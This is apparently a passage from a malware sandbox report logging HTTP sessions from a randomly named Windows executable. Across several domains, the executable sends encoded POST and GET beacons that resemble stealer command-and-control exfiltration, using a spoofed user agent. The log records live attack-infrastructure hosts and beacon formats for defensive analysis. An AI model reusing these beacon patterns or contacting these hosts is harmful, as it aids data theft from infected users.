                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fddf0e82efa5-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      36 | 192.168.2.8 | 49745 | 188.114.96.3 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:18.310914993 CET | 482 | OUT | GET /8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.cifasnc.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:18.811443090 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Mon, 13 Jan 2025 14:14:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:18 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      location: http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh
                                                                      vary: User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3EOkbyTwPMHTWGz8qyYbn2unNfAxKkn2%2FBCzgrdIjRtGk%2FL6Jw87CDGgf44BEco%2FtLYOp3cke0BQONBhclVBQMttSfNufFzJEOUDrPhjgAEqs8sXM%2Bq%2BG91O83eSw98n9dA"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fdeedd614303-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1555&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d
                                                                      Data Ascii: 0
                                                                      Jan 13, 2025 15:14:18.811465979 CET | 1 | IN | Data Raw: 0a
                                                                      Data Ascii:


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      37 | 192.168.2.8 | 49746 | 199.59.243.228 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:32.060108900 CET | 761 | OUT | POST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=Q+iS5WiZOpIo/XMEb90fMbbDFKxx/CCs8kV5WGxzeyRvYLEGTTARdn5srXoMXSlsXq3dMJK1lBGZjE3S6Ol6Z0DA9GFoqmLXZ/DKdKA7kdseLoRFIGXWZkIgkT9bcdBpWfBf+JFxHewMnkc1p7+lQQ3Den+xEbPIGXtMQwzsmkDv44GmBxylw4PSxKqokCw+0TWN59g=
                                                                      Jan 13, 2025 15:14:32.502594948 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:31 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: 5d7143f2-8fd2-4d90-bb4a-63126e53dff9
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=5d7143f2-8fd2-4d90-bb4a-63126e53dff9; expires=Mon, 13 Jan 2025 14:29:32 GMT; path=/
                                                                      connection: close
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:32.502618074 CET | 599 | IN
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWQ3MTQzZjItOGZkMi00ZDkwLWJiNGEtNjMxMjZlNTNkZmY5IiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      38 | 192.168.2.8 | 49747 | 199.59.243.228 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:34.614660978 CET | 781 | OUT | POST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg1vZr0GBCARcn5sl3oJZyl7Xqr/MIm1lHqZjBLS6dd7YkDO2mFqyGLXZ/DKdKURkd0eLdBFJnXVREIjtz9bYdBtWfBY+IZPHcIMnks1ovqmbQ3FD3/HMILFD3pQMmyK6X7k9O3MbT6jz4n5xJCeh1tWuwG9nq33tvomXkWyet3Kti/0u+2w
                                                                      Jan 13, 2025 15:14:35.068764925 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:34 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: 2b03d258-1c76-4021-84aa-f6112598f5b8
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=2b03d258-1c76-4021-84aa-f6112598f5b8; expires=Mon, 13 Jan 2025 14:29:35 GMT; path=/
                                                                      connection: close
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:35.068820000 CET | 599 | IN
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmIwM2QyNTgtMWM3Ni00MDIxLTg0YWEtZjYxMTI1OThmNWI4IiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      39 | 192.168.2.8 | 49748 | 199.59.243.228 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:37.162621975 CET | 1798 | OUT | POST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg9vZaUGTx4RO35s7noIZyk5Xqz7MJaLlEeZjn/Sq8d7XkDO5GFrqmKXZ+vOdKERkd0eLcxFZGXVckIgkT9fcdBRWfZX+Is6HtoMpgI1vcSmHA3HQH/PMPCFD3krMmvv6XTk+4qGHCqYi7HZ/ZCfoCQ1qBaLu9XptKk0ZSGCWuSk7FPZ+uHY+lkVwJDcClJjf1e1rE0Wj/E25Q5MVikCQzRDCgFUoFDdN2//Xe010K+4H1MH6KS5ILtJNhfW3DiHMQz4t8YtHtQDrP4ls7yTmC6SLHe4JH0jve6K2KhtLAYbEHpFBd9slS5sWTh8j1j9uhAMJXAWESlfuQ69xb6Gk6/E0EjurDQroav1egoHkcgK1ZCPibUx1AC4Aos1+LfnEPCXZmQCI5+2VqAmCG8q02JwMqS7eeSCIDSIlmxCyZnwyD+GBsHH5h6Pp5Mk0MKgdFFFYd8DVB9DaJCkpqx2UsqsPiseuZi3kfza1VIx6Wz5bx7polcobo06DXtjgLaSB7pR8onFEkFTAZiXZHZLszXqa00wdaMSCel7tMa88G27YyHOLfscJIBM1bLOkCsTm4wn/0z5NOr+n9zTikuIjKFxM6g3UkrsHskeSf757czrBW1UqxTH9GlL1lIArfXU6zOVz93HnXTvoEI4cnwWzu8W3H4mra4QV16iZFYNrsiOA3lN7t2sy1xRGuUFAcpEOIBKBzFZzP5nk9O9Y4Megp4ginNKaZZMkZCgkYEq6PBF1q91L9sBESyqIQJ8odRTB9V7g6FeyYMEBE9JaspnHAlPqfkhdRYT0gvAaL/nYXmv2f+uWI27HWedx+oUN1ZnviD+ctlR5/k6JRNxA6V17LPntG8orWXENW6TSl44rjBaR4huUh7271fcO0eJHHhOoarBE86FxPvSahwAlfXlyWHVLJ73K0EfqUccAyaK2uL99kKts7Cs1Ds+rbNS3PQrhi6j5qq [TRUNCATED]
                                                                      Jan 13, 2025 15:14:37.603966951 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:36 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: c60d7529-7a19-4afd-b037-79a5bc263127
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=c60d7529-7a19-4afd-b037-79a5bc263127; expires=Mon, 13 Jan 2025 14:29:37 GMT; path=/
                                                                      connection: close
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:37.604029894 CET | 599 | IN
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzYwZDc1MjktN2ExOS00YWZkLWIwMzctNzlhNWJjMjYzMTI3IiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      40 | 192.168.2.8 | 49749 | 199.59.243.228 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:39.696012020 CET | 490 | OUT | GET /dx3i/?60q4=d8Ky6hmePKhU2XxCZcorJpWfFstOvl7w2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdGjvy0c7sWjSWanGPqhflfgeWepWZ17tVEIX5zsWYbAgUQ==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.denture-prices.click
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:40.163145065 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:39 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1510
                                                                      x-request-id: 4c2989e7-2f0a-417e-87c7-3f6456f8e97d
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CTi4Yc6uqNq/upv2QMfm0FYp/WTcwtjAppg1oJGd0c2PUwNGQLwYyMR+dw54UAsr94cZ0gjlEY51DejOvEMsCQ==
                                                                      set-cookie: parking_session=4c2989e7-2f0a-417e-87c7-3f6456f8e97d; expires=Mon, 13 Jan 2025 14:29:40 GMT; path=/
                                                                      connection: close
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CTi4Yc6uqNq/upv2QMfm0FYp/WTcwtjAppg1oJGd0c2PUwNGQLwYyMR+dw54UAsr94cZ0gjlEY51DejOvEMsCQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:40.163166046 CET | 963 | IN
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGMyOTg5ZTctMmYwYS00MTdlLTg3YzctM2Y2NDU2ZjhlOTdkIiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      41 | 192.168.2.8 | 49750 | 13.228.81.39 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:45.242202044 CET | 758 | OUT | POST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=VRKAxCXV7CRWJxsBZnOXTvYRbXuT2GkTSehJip32wYooXN86iKPftsrwVBgiERwA+KLDdH/B/1SuHEdj7d5HeFI/uwd/r1iZWpvsxwCrw4TDel75WE8sG1xnV1W0giuG9tvSg9zg/TSAWU58MV7vpqYl0X+oe3PWNPC50+z9AcZFobib5lG+aVgdIeq1TBhoCaIP2h8=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      42 | 192.168.2.8 | 49751 | 13.228.81.39 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:47.801954985 CET | 778 | OUT | POST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtYoXvk6jOTfssrwNRhoARwe+KG8dCHB/x6uHARj6uhGR1I9lQd9v1iZWpvsx0rOw8/DeVL5HQovMVxoS1W03yuC9tv0g/Xa/QmAWWx8MnDgnqZu63/cYHqoNoWE5/jpeMR6ptTxjHO4ZVI2IdCDW28AY5Y/o2pAK1WdIGxA8LlgPUw4MQyQ


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      43 | 192.168.2.8 | 49752 | 13.228.81.39 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:50.345083952 CET | 1795 | OUT | POST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Timestamp:Jan 13, 2025 15:14:51.283473969 CET
                                                                      Bytes transferred:370
                                                                      Direction:IN
                                                                      Data:
                                                                      HTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 14:14:51 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session ID:44
                                                                      Source IP:192.168.2.8
                                                                      Source Port:49753
                                                                      Destination IP:13.228.81.39
                                                                      Destination Port:80
                                                                      PID:1484
                                                                      Process:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp:Jan 13, 2025 15:14:52.888453007 CET
                                                                      Bytes transferred:489
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.sonixingenuine.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Timestamp:Jan 13, 2025 15:14:53.830084085 CET
                                                                      Bytes transferred:522
                                                                      Direction:IN
                                                                      Data:
                                                                      HTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 14:14:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg==
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session ID:45
                                                                      Source IP:192.168.2.8
                                                                      Source Port:49754
                                                                      Destination IP:154.39.239.237
                                                                      Destination Port:80
                                                                      PID:1484
                                                                      Process:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp:Jan 13, 2025 15:15:00.843029022 CET
                                                                      Bytes transferred:731
                                                                      Direction:OUT
                                                                      Data:
                                                                      POST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Session ID:46
                                                                      Source IP:192.168.2.8
                                                                      Source Port:49755
                                                                      Destination IP:154.39.239.237
                                                                      Destination Port:80
                                                                      PID:1484
                                                                      Process:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp:Jan 13, 2025 15:15:03.392767906 CET
                                                                      Bytes transferred:751
                                                                      Direction:OUT
                                                                      Data:
                                                                      POST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Session ID:47
                                                                      Source IP:192.168.2.8
                                                                      Source Port:49756
                                                                      Destination IP:154.39.239.237
                                                                      Destination Port:80
                                                                      PID:1484
